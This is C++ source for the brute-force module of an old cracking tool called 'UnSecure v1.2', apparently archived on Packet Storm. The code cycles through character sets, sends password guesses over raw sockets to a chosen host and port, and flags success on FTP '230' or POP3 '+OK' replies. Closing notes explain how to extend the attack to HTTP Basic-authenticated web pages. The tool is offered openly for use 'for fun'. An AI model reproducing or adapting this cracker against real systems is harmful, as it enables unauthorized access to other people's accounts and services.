Brute force and ports algorithm source code for Unsecure.
4542d93ec268571ae1545491fd40563aUnSecure v1.2 "the part that does the fun work" code.
by Utah, Guns, and Paine.
--------------------------|CUT HERE|-----------------------------------
//This is the accual C++ code for the brute force and ports algorithm.
//It was written in VC++ 5
//
//At the end I explain how to build in an attack for protected web pages.
//
//There is odd code in there, for CString converstions, but it's
//basically a direct rip of the brute force, and port code :
//
//We use RAW sockets... it's alot faster than going through win API
//
//Note : this function was threaded so there is no accual GUI interaction
//variables starting with a g_ are global, and therefore accessable by
//threads and the GUI
//
//Have fun!
void brute_and_port_stuff_decently_optimized()
{
//Was brute force selected
if(brute_flag==TRUE) {
//The next if statments look for options being checked in the GUI
//We have an array, alphabet, which designates what characters to use.
//Using the ASCII charset, we loop through and add the chars.
//Alphamax points to the end of the charset in the array.
if(brute_special==TRUE) {
for(x=33;x<127;) {
alphabet[alphamax]=x;
x++;
alphamax++;
}
}
else {
if(brute_uaz==TRUE) {
for(x=65;x<91;) {
alphabet[alphamax]=x;
x++;
alphamax++;
}
}
if(brute_laz==TRUE) {
for(x=97;x<123;) {
alphabet[alphamax]=x;
x++;
alphamax++;
}
}
if(brute_09==TRUE) {
for(x=48;x<58;) {
alphabet[alphamax]=x;
x++;
alphamax++;
}
}
}
if(brute_custom==TRUE) {
alphamax=0;
g_custom2=g_custom+"<<";
//We have to do odd things when converting using the CString type.
for(count2=0;g_custom2[count2]!='<';) {
alphabet[count2]=g_custom2[count2];
count2++;
}
alphamax=count2;
}
g_pause=0;
sc2.Create();
g_status="Attempting to connect...";
cnt=sc2.Connect(g_ip, g_port);
if(cnt==0) {
g_status="No connection could be established";
goto stopit;
}
g_status="A connection was established";
sc2.Receive(&rcv, sizeof(rcv), 0);
int y;
for(y=0;y<20;) {
ch[y]=-1;
y++;
}
ch[0]=-1;
for(x=1;x<g_brutenum;x++) {
used[x]=1;
ch[x]++;
}
if(g_open==1)
for(x=0;x<strlen(g_password);) {
used[x]=1;
for(y=0;y<100;) {
if(alphabet[y]==g_password[x])
ch[x]=y;
y++;
}
x++;
}
while(ch[19]<alphamax) {
ch[0]++;
for(x=0;x<20;) {
if(ch[x]==alphamax) {
used[x+1]=1;
ch[x]=-1;
ch[x+1]++;
}
x++;
}
x=x;
for(x=0;x<20;) {
if(used[x]==1) {
if(ch[x]==-1)
ch[x]=0;
xpass[x]=alphabet[ch[x]];
snd2[x]=alphabet[ch[x]];
}
x++;
}
x=5;
for(z=-1;z<20;z++) {
if(used[z]==1)
x++;
}
g_putpass=xpass;
g_putpass="pass "+g_putpass;
for(z=x-1;z<sizeof(xpass);z++)
xpass[z]=' ';
for(count2=0;count2<x;) {
snd2[count2]=g_putpass[count2];
if(count2>4)
if(count2-5<x-4)
xpass[count2-5]=g_putpass[count2];
count2++;
}
snd2[x]=13;
snd2[x+1]=10;
z=x-5;
for(x=z;x<sizeof(xpass);) {
xpass[x]=' ';
x++;
}
g_password="";
g_password=xpass;
g_status="Testing account";
g_stay=sc2.Send(&snd, count+2, 0);
g_status="Waiting for response";
g_stay=sc2.Receive(&rcv, sizeof(rcv), 0);
g_status="Testing account";
g_stay=sc2.Send(&snd2, count2+2, 0);
g_status="Attacking";
g_stay=sc2.Receive(&rcv2, sizeof(rcv), 0);
g_status="Combination transmission complete";
g_wordsdone++;
g_cmp[0]=rcv2[0];
g_cmp[1]=rcv2[1];
g_cmp[2]=rcv2[2];
if(strstr(g_cmp, "230")) {
g_finalpass=g_ip+" is UnSecure."+c+l+"The password is "+xpass;
AfxMessageBox(g_finalpass);
g_good=1;
goto stopit;
}
if(strstr(g_cmp, "+OK")) {
g_finalpass=g_ip+" is UnSecure."+c+l+"The password is "+xpass;
AfxMessageBox(g_finalpass);
g_good=1;
goto stopit;
}
if(g_stay==SOCKET_ERROR) {
g_status="You have been disconnected";
if(g_rec==TRUE)
{
g_status="Attempting to RE - connect...";
sc2.Close();
sc.Close();
cnt=0;
sc2.Create();
while(cnt==0) {
cnt=sc2.Connect(g_ip, g_port);
}
}
else
goto stopit;
}
}
g_status="Brute force attack finished";
sc2.Close();
}
--------------------------|CUT HERE|-----------------------------------
Now I'll explain how you could add this to secure/unsecure webservers.
(HTTP authentication)
Connect to port 80 of the server.
Issue this command :
GET / HTTP/1.0
followed by a crlf. Where the first / is the protected page.
Now issue this command :
Authorization: Basic 8f4398j:494w094
Where the 8f4398j:494w094 is a username/password pair base 64 encoded.
To encode to base 64 :
get three bytes (total of 24 bits)
split the 24 bits in to four 6 bit numbers.
Repeat process.
Ex:
00101101 | 10010110 | 01101001
becomes
001011 | 011001 | 011001 | 101001
Test it be telneting to port 80 on a server with a protected page.
There you have it.
Like I said... Have fun.
--Utah
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!